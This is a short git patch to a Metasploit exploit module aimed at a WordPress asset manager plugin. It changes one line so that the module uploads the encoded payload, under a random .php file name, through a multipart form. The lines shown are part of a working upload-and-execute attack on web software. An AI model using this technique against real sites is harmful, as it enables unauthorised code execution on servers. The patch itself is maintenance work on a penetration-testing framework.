From 75057b5df3f691970a56dd3971a9d439a2e0ad42 Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Tue, 29 Jul 2014 21:02:15 +0200 Subject: [PATCH] Fixed variable --- modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb index de3ce330a3..22a6305195 100644 --- a/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_asset_manager_upload_exec.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_name = "#{rand_text_alpha(5)}.php" data = Rex::MIME::Message.new - data.add_part(php_payload, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") + data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"") post_data = data.to_s print_status("#{peer} - Uploading payload #{payload_name}")